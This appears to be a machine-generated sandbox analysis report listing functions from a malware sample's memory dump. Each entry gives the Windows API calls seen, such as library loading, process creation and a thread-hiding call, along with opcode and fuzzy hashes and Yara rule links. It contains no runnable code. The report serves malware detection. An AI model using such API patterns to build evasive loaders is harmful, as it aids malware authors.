Function 021F090D, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 021F43F3: LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: fc5e12a7208d7eeaf3fa0c8e2fb70c4e3ff339b7f52ea07b5aeaaf0a8c77fa68
Instruction ID: d18a2850d790088140d902706c68e1a4c08d239c9a65cabc372c821cd4982163
Opcode Fuzzy Hash: fc5e12a7208d7eeaf3fa0c8e2fb70c4e3ff339b7f52ea07b5aeaaf0a8c77fa68
Instruction Fuzzy Hash: A9115920AC8306DEEF741A248C657EB2653AF87360F544216DFB9DB1C6DB354486CA02

Uniqueness

Uniqueness Score: -1.00%

Function 021F5F29, Relevance: 1.6, APIs: 1, Instructions: 58processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 021F6035

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 3e5ed72df94126310b87b578e0f6c02fa5e040b45b7480ad2406f9940cf01342
Instruction ID: 0b7e1ccdafb8ab3967fbdd8ab880c265ec5c402accedb209834ae79513767a1f
Opcode Fuzzy Hash: 3e5ed72df94126310b87b578e0f6c02fa5e040b45b7480ad2406f9940cf01342
Instruction Fuzzy Hash: 301170206C5285DEFFAE9E14C4587A8337ABF46364FEA529AC7720B861C33594C9C742

Uniqueness

Uniqueness Score: -1.00%

Function 021F0935, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 021F43F3: LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoadProcessTerminate
String ID:
API String ID: 3349790660-0
Opcode ID: 0ee4f8b71b9e9890bca3a9eeaae815bac29d57071ee3431dec2b5577da069c36
Instruction ID: b34a1e03128e263fac47c8cedfdf9330be1e0d84ac03beb303d7aa61d0cba050
Opcode Fuzzy Hash: 0ee4f8b71b9e9890bca3a9eeaae815bac29d57071ee3431dec2b5577da069c36
Instruction Fuzzy Hash: FE019C10AC8305EDFEB419248C253EF11436F87770F6443269F79EE1C6DB3940868902

Uniqueness

Uniqueness Score: -1.00%

Function 021F0959, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 1853377a2518fa2ae3004ee7545415eafd708800d84bb97918a0800c4fc2fbff
Instruction ID: 5c4e57beb53397547fd533bd9667eac7b1ef4fe1bd552921f4413285f8ad8c69
Opcode Fuzzy Hash: 1853377a2518fa2ae3004ee7545415eafd708800d84bb97918a0800c4fc2fbff
Instruction Fuzzy Hash: C901A2519C8305EDFE741924CC257FF11476B47374F544326DF79EA1C6EB3940468902

Uniqueness

Uniqueness Score: -1.00%

Function 021F5F89, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 021F6035

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: d9db0e4faebc12fdfebca4f5889298b58ec943f613a63cf22b10b28d5e310b23
Instruction ID: 6927454131e307027a008a1e5735e75e2f51c464493da8b260f630bec1958c13
Opcode Fuzzy Hash: d9db0e4faebc12fdfebca4f5889298b58ec943f613a63cf22b10b28d5e310b23
Instruction Fuzzy Hash: 14F0C2206D92C6CDFFAE6D14C4603F4232AEB93350BFA0269CBB24B920C33254CAC351

Uniqueness

Uniqueness Score: -1.00%

Function 021F43F3, Relevance: 1.5, APIs: 1, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2ef5bc54a2579bd00cf1796c88ad478f5dad99e10e0d0ad34de2e94c601eba6d
Instruction ID: c4d75415f1d8b4f834a727efc864bce2914d7633a699f1ccdca21d9a384aed53
Opcode Fuzzy Hash: 2ef5bc54a2579bd00cf1796c88ad478f5dad99e10e0d0ad34de2e94c601eba6d
Instruction Fuzzy Hash: C5F0B4846D8365AEEAF83B646A007BF32598F407A5F920617FF77A1051C714C581D953

Uniqueness

Uniqueness Score: -1.00%

Function 021F4419, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 565f230b0df0bd86595e3a1787361c85ad439ac825fae00e83e32758cf800b51
Instruction ID: 8d1faac604cc0adaac631e01a2caec6e11dc7ae78257302dc8a5fe2855731113
Opcode Fuzzy Hash: 565f230b0df0bd86595e3a1787361c85ad439ac825fae00e83e32758cf800b51
Instruction Fuzzy Hash: EAF0E9942D83659EDAF83B606A007BF33559F00365F520617FF77A6051C7148585D953

Uniqueness

Uniqueness Score: -1.00%

Function 021F0981, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: a59cb3e4daf65d2c557647d4d01e72f3b0ff9011afbdca7b117640a0899fb2c1
Instruction ID: 768134e61837c0810f04397cbf33f968575972a287c2927993181d00a8fdfcca
Opcode Fuzzy Hash: a59cb3e4daf65d2c557647d4d01e72f3b0ff9011afbdca7b117640a0899fb2c1
Instruction Fuzzy Hash: 8BF050615C4305DDEAB41A148C293EF21466F47364F540626DF79EE082EB3540854E12

Uniqueness

Uniqueness Score: -1.00%

Function 021F5FB9, Relevance: 1.5, APIs: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 021F6035

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: fffe536e02142290a379ec65e71830a0eaad6df93512889830a5c01629af2c6f
Instruction ID: 044eb477bb534e65048635391118820457cc7c873461db90a64c3c5b3d71a089
Opcode Fuzzy Hash: fffe536e02142290a379ec65e71830a0eaad6df93512889830a5c01629af2c6f
Instruction Fuzzy Hash: 38F0A0207C92C6CDBFAE5D24C4A41F8236AEA933543FE0269CBB287C20C322448AC341

Uniqueness

Uniqueness Score: -1.00%

Function 021F4445, Relevance: 1.5, APIs: 1, Instructions: 34libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ce64c53a23f33e4a645af9677b8e20bc51159f3f195831005658ee8ca3d4995d
Instruction ID: 6b9ac6e217fb99756fef245185f963c57534e67fc73692e1ea306f3f48b4f9db
Opcode Fuzzy Hash: ce64c53a23f33e4a645af9677b8e20bc51159f3f195831005658ee8ca3d4995d
Instruction Fuzzy Hash: C3F0A0946D83669EEAF43B60AA007BF33568F007A5F661617FF73A5050C72485859943

Uniqueness

Uniqueness Score: -1.00%

Function 021F4465, Relevance: 1.5, APIs: 1, Instructions: 30libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7799e552aa92b02de1f1f57abaa6656f01727fd8023c73dbc98d4fe2449a9046
Instruction ID: 4ca11c1bb6b864b388a845a2deccf41284b1c0a189c1bdd1075bc00a4786850e
Opcode Fuzzy Hash: 7799e552aa92b02de1f1f57abaa6656f01727fd8023c73dbc98d4fe2449a9046
Instruction Fuzzy Hash: A5E092542D43699FDAF43BA07A507BF33468F00765F515217FF76A4061C72885819947

Uniqueness

Uniqueness Score: -1.00%

Function 021F5FED, Relevance: 1.5, APIs: 1, Instructions: 29processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 021F6035

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 99ba58641c40395e03fd436d10df0066ea76505775e836d2bb9c6a7411935ec5
Instruction ID: d81e37b2ef04773e173ed51a6b891a4c04d8ad1b87a6c2aa0ea0c09402659ce5
Opcode Fuzzy Hash: 99ba58641c40395e03fd436d10df0066ea76505775e836d2bb9c6a7411935ec5
Instruction Fuzzy Hash: 84E09B240C97C5CEEF7F5E3084E06697B6AAD82200736456EC7F217C45C326598DC751

Uniqueness

Uniqueness Score: -1.00%

Function 021F4475, Relevance: 1.5, APIs: 1, Instructions: 29libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9931607e05745f399b12dbdda709158b68553a161f7e1977afa32410da0dd5c2
Instruction ID: 61d95a7cb63809dff34a5a169a49c557e39347c88d268e0b023c96e5dbe3b778
Opcode Fuzzy Hash: 9931607e05745f399b12dbdda709158b68553a161f7e1977afa32410da0dd5c2
Instruction Fuzzy Hash: 3EE068983C43299FEBF03FA066007BF33568F00751F21112BFF32A5111C72485849943

Uniqueness

Uniqueness Score: -1.00%

Function 021F03A9, Relevance: 1.5, APIs: 1, Instructions: 27nativethreadCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(021F03E0,?,00000000,?,021F3F3F,?), ref: 021F03B4
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000040,021F0479,00000000,00000000,00000000,00000000,?,00000000,00000000,021F4A9F,?,021F4489), ref: 021F04BE

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: EnumInformationThreadWindows
String ID:
API String ID: 1954852945-0
Opcode ID: 6f7a577cc0267b4ce5a71ff2f530bf20998ac533e3ef8c4b8b0ac98e320da593
Instruction ID: d4c39e6f57995a601b037f39c0f16c2a6cc9d1f78bdd29171cdc4bc2b522a491
Opcode Fuzzy Hash: 6f7a577cc0267b4ce5a71ff2f530bf20998ac533e3ef8c4b8b0ac98e320da593
Instruction Fuzzy Hash: F7E0D8301492009FE6A4EA30DC40BAB3316EB9A320F708506E576DB195C73154828601

Uniqueness

Uniqueness Score: -1.00%

Function 021F09C1, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 4a1eec36e9903b239d11ca05ff410860ff7987b8352e6b5f4151a35d734de0ae
Instruction ID: 71f669dff5351f66dabe5db77ee97ab0bda90af6b1bf436d5535e114b3944772
Opcode Fuzzy Hash: 4a1eec36e9903b239d11ca05ff410860ff7987b8352e6b5f4151a35d734de0ae
Instruction Fuzzy Hash: 5AE086711C82059EEAF41E549C2A3EF2241AB4B764F240717DF79EE1C5EB7540868F53

Uniqueness

Uniqueness Score: -1.00%

Function 021F449D, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f9a0280dd91e36a2ed3dc3f59aa8e31ab810de7f3b6384d72e1f243b12f1601d
Instruction ID: d9f7f452a613de909801ef07a314f38b5e5680af8d50cec9691907d87a3ad667
Opcode Fuzzy Hash: f9a0280dd91e36a2ed3dc3f59aa8e31ab810de7f3b6384d72e1f243b12f1601d
Instruction Fuzzy Hash: 89E08C68284229ABEAA43FA0A900BBF33568F40741F255167FB72A9010CB2486849A47

Uniqueness

Uniqueness Score: -1.00%

Function 021F3D85, Relevance: 1.5, APIs: 1, Instructions: 21fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(021F02FC,80000000,00000001,00000000,00000003,00000000,00000000,021F3D0E,021F3E13,021F02FC,?,?,?,?,?,021F00DE), ref: 021F3DE3

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6aa4c29ee3de8f810318897ecb6f279d5803a4a31b5f02876bb3f0124b7fa77b
Instruction ID: 0159f65c45f80a08a8843a2301904f2aaff5a422688dcde3c487f4c0e4981617
Opcode Fuzzy Hash: 6aa4c29ee3de8f810318897ecb6f279d5803a4a31b5f02876bb3f0124b7fa77b
Instruction Fuzzy Hash: B3E05E766D8385BAFBB89A008E86FF267126B90F00F924094BF363F2C5D7A21D55C512

Uniqueness

Uniqueness Score: -1.00%

Function 021F601D, Relevance: 1.5, APIs: 1, Instructions: 19processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 021F6035

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 659c0820f0bc2dae3a82eb088e78ef2147a8328c558f527950c9ba60267143e0
Instruction ID: 0e98f44f1e2a651cacea01236ca7006a8c0724a04681314855a68ef18d7b54ea
Opcode Fuzzy Hash: 659c0820f0bc2dae3a82eb088e78ef2147a8328c558f527950c9ba60267143e0
Instruction Fuzzy Hash: 43D0123018528589EFAD8D20C5E02A9272B9EC1240776446CC67217804C737988DC640

Uniqueness

Uniqueness Score: -1.00%

Function 021F44BD, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,082962C8,?,021F0430,00000000,?,021F3F3F,?), ref: 021F44F1

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 19a636a72d78ebd7d51db0cf72c6f2c4616357c5b25d09d7132976b22a308295
Instruction ID: 8897ec197faf5e7d098822c2b6e6910caf9aa3adde1bfc501767e7fa457af533
Opcode Fuzzy Hash: 19a636a72d78ebd7d51db0cf72c6f2c4616357c5b25d09d7132976b22a308295
Instruction Fuzzy Hash: FAD0A7583C422D5B4B943B7875105FE33528E006917208163FB7288120D7288A498E82

Uniqueness

Uniqueness Score: -1.00%

Function 021F602D, Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE ref: 021F6035

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 20c255c4d371b4b743ec3cec01ca9376d736dfa2941b6f139fe901040211fc94
Instruction ID: 5f9161ea16fafd4bf5245fa9ed2eec759b4dda8e7ffee162facff41be196884c
Opcode Fuzzy Hash: 20c255c4d371b4b743ec3cec01ca9376d736dfa2941b6f139fe901040211fc94
Instruction Fuzzy Hash: F1D05E74085289CEEF6DAD20C5A02A9332AAFC5600B36446CCA332B904C33AA8898791

Uniqueness

Uniqueness Score: -1.00%

Function 021F3D90, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(021F02FC,80000000,00000001,00000000,00000003,00000000,00000000,021F3D0E,021F3E13,021F02FC,?,?,?,?,?,021F00DE), ref: 021F3DE3

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3ce9ff1ffd66f75b6be24c1a5c9ba84a3290a7a9bf65a249ed41fd5d7d2f9300
Instruction ID: 82b77a90d74a152ef25c87e5a63f8390fe5a01fd84d4bd414a273b158075b4e1
Opcode Fuzzy Hash: 3ce9ff1ffd66f75b6be24c1a5c9ba84a3290a7a9bf65a249ed41fd5d7d2f9300
Instruction Fuzzy Hash: 36D012327D4341F9FB7849515F96FA626155F50F41F5240593F367A1C0D7E21950C116

Uniqueness

Uniqueness Score: -1.00%

Function 021F28E3, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f1b26e2037372a7db27c3cdc66ad6899fbc4e1e997b87277bfe688ba0131815f
Instruction ID: 70fe9265286ed07a446af594e7a64f4c0b51134aa35f13f38bd74724a99e6591
Opcode Fuzzy Hash: f1b26e2037372a7db27c3cdc66ad6899fbc4e1e997b87277bfe688ba0131815f
Instruction Fuzzy Hash: F9C04C2224C109EEDEB809546C67BBD11846B0BA78F300717EE3AED5C1DB6088464B12

Uniqueness

Uniqueness Score: -1.00%

Function 021F28F5, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 021F28FD

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 8825e278c40a4102f37c30545adabdbad11506a045e5a973eee87aea6c19c473
Instruction ID: b51f2f0f9099020c87330545f9090c5eaa993bdee02fc96c9af251ba19b5a8c1
Opcode Fuzzy Hash: 8825e278c40a4102f37c30545adabdbad11506a045e5a973eee87aea6c19c473
Instruction Fuzzy Hash: 05C09B2310940D8FCE655F54941739B7354775B514F100953D61DFE601DB60848A4B22

Uniqueness

Uniqueness Score: -1.00%

Function 021F3DB5, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(021F02FC,80000000,00000001,00000000,00000003,00000000,00000000,021F3D0E,021F3E13,021F02FC,?,?,?,?,?,021F00DE), ref: 021F3DE3

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f3fe59c52cc006376a4b063659ff17c34bdcc539515192e400317586829a8c3b
Instruction ID: c90499433c657a0e22dde69048e67660316f4738e09cab2958eeff5e384c90ce
Opcode Fuzzy Hash: f3fe59c52cc006376a4b063659ff17c34bdcc539515192e400317586829a8c3b
Instruction Fuzzy Hash: 8BC0127145111ADAE630BA004D44B827221AB10B00F6200586B207B20192311418C525

Uniqueness

Uniqueness Score: -1.00%

Function 021F268A, Relevance: 1.3, APIs: 1, Instructions: 39sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: b1a4af26096d5fc28f52b9da8a6e0ea23d499cc81d1537c3859cbdbfc98797c5
Instruction ID: d3f8988324c1585c11c309c12db3902ca54e8d4cdee215092e74038dbcb3214b
Opcode Fuzzy Hash: b1a4af26096d5fc28f52b9da8a6e0ea23d499cc81d1537c3859cbdbfc98797c5
Instruction Fuzzy Hash: 03F09036285288EFDFB91E749C54BE97BA3AF12320F504148FEA445092CB338855DF81

Uniqueness

Uniqueness Score: -1.00%

Function 021F2606, Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d0043ab1bc922e5227b2e3dcdae90e1379f084824c876b2a209f2d32a129ba97
Instruction ID: b144f683449531001b79efc467448c3821533c428b13f9efd17fbb179077f2eb
Opcode Fuzzy Hash: d0043ab1bc922e5227b2e3dcdae90e1379f084824c876b2a209f2d32a129ba97
Instruction Fuzzy Hash: F3F01C36285288EFDFB92E609C05BD83723BF25321F854108FEA8550A1CB73C961DF41

Uniqueness

Uniqueness Score: -1.00%

Function 021F2641, Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d041722afeb3fcbbe31b33ff8c3601916ed3a0800fbce4a74bf3eb9a52f9f3d0
Instruction ID: 5172cadd64706584c5176579fc42b4ae937029105a96c6f0a03a5cb043c8a419
Opcode Fuzzy Hash: d041722afeb3fcbbe31b33ff8c3601916ed3a0800fbce4a74bf3eb9a52f9f3d0
Instruction Fuzzy Hash: 40D05E7A282244AFDFB82EA09C09BD835136F11310F814008FF2C140918B338955CF82

Uniqueness

Uniqueness Score: -1.00%

Function 021F2671, Relevance: 1.3, APIs: 1, Instructions: 10sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(0000000A,?,?,00000000,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 021F2678

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: aecfb7a2901e2014273191a7f1474e4b960ec210d7829afadc17dd2a3723d7c8
Instruction ID: 1d6e6ebb8379fa84f34c99dd9a7d9eccd754a1c2f68a4e0fd016f76cc9f73d74
Opcode Fuzzy Hash: aecfb7a2901e2014273191a7f1474e4b960ec210d7829afadc17dd2a3723d7c8
Instruction Fuzzy Hash: 92C0922F340244DBEB704EE4A85ABD62B12AF52351FC10088BE5D7A0C08B758D9ACE12

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 021F15CB, Relevance: .4, Instructions: 350COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 333b285b6b827f6a6a1a16f671250eb5487506316e00401b16e4d383db0bd2dc
Instruction ID: 2bd291f4bc10a0d63f7e14a5f53742eaaa7b94b355e2a924db944ae0a9c9fbf8
Opcode Fuzzy Hash: 333b285b6b827f6a6a1a16f671250eb5487506316e00401b16e4d383db0bd2dc
Instruction Fuzzy Hash: AFC1E271684606FFDBA89F28CC90BE5B3A5BF04350F554229EEBE93280D735A854CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 021F53B5, Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 791ca7a3e6e9217b141671d25b6624c5dbdec08e1ab518d8e548950382274fa1
Instruction ID: 27e6f77bdefb0e5c165c2890365bfc9be2cdaa2b57795da0c67a773d13478647
Opcode Fuzzy Hash: 791ca7a3e6e9217b141671d25b6624c5dbdec08e1ab518d8e548950382274fa1
Instruction Fuzzy Hash: 0951B860588341EFDBA9CF28849476577D3AF16220FC98299DEB64F2E6E3348442CB52

Uniqueness

Uniqueness Score: -1.00%

Function 021F1C59, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf3365218842aa73a7e3f5e1a6e27523c36b042d3a275a951ffde79c103e2f58
Instruction ID: cf02ff80608f0bee18a83bcfebcb59e90a013ea3d8a98a1a6013d480b68a25c7
Opcode Fuzzy Hash: cf3365218842aa73a7e3f5e1a6e27523c36b042d3a275a951ffde79c103e2f58
Instruction Fuzzy Hash: A0412A716C4301EFF7A89F24C86CFA572A5BF14314F96415AEE7A9B1D1C7B1C880CA52

Uniqueness

Uniqueness Score: -1.00%

Function 021F1AA5, Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd0015cd646a5cbe759b52261f8526f900f20183654a0c6344303f9172bf0b4e
Instruction ID: ed499765233d0e7015f646674f09d3bca241cdb8987f57d4696277a7a6fc8535
Opcode Fuzzy Hash: dd0015cd646a5cbe759b52261f8526f900f20183654a0c6344303f9172bf0b4e
Instruction Fuzzy Hash: C631E971684506EFDBEC9E18CC50BE533A5BF04320F564219EDBDD3681D721A844CF80

Uniqueness

Uniqueness Score: -1.00%

Function 021F1C71, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b18e490717dfde43b1ee50ae027219acec396db8fd4446bf97f127d611d63d1
Instruction ID: 693219aadb772819130dacd4aa6ef6207db3aaa4e3d983f55045c9e78de999b9
Opcode Fuzzy Hash: 6b18e490717dfde43b1ee50ae027219acec396db8fd4446bf97f127d611d63d1
Instruction Fuzzy Hash: 5A21D870685345EFEBB85F148CADFA532A1BF04710F82415AEF7A6B192C7B18880CA12

Uniqueness

Uniqueness Score: -1.00%

Function 021F4A29, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.313492179.00000000021F0000.00000040.00000001.sdmp, Offset: 021F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74044ce1b252886ba6971a2feffec4a39ca6fe8f40de5837de6b9b7cd03942e
Instruction ID: 6c159d2b9d4d2c7a0ae5cf661425933fb9336e2f52f1d96f72f56d17cace4ec5
Opcode Fuzzy Hash: b74044ce1b252886ba6971a2feffec4a39ca6fe8f40de5837de6b9b7cd03942e
Instruction Fuzzy Hash: 94F0C0783853018FD7A9DA14C584E5773A1AB58311F138496E737C7625D730D840E619

Uniqueness

Uniqueness Score: -1.00%

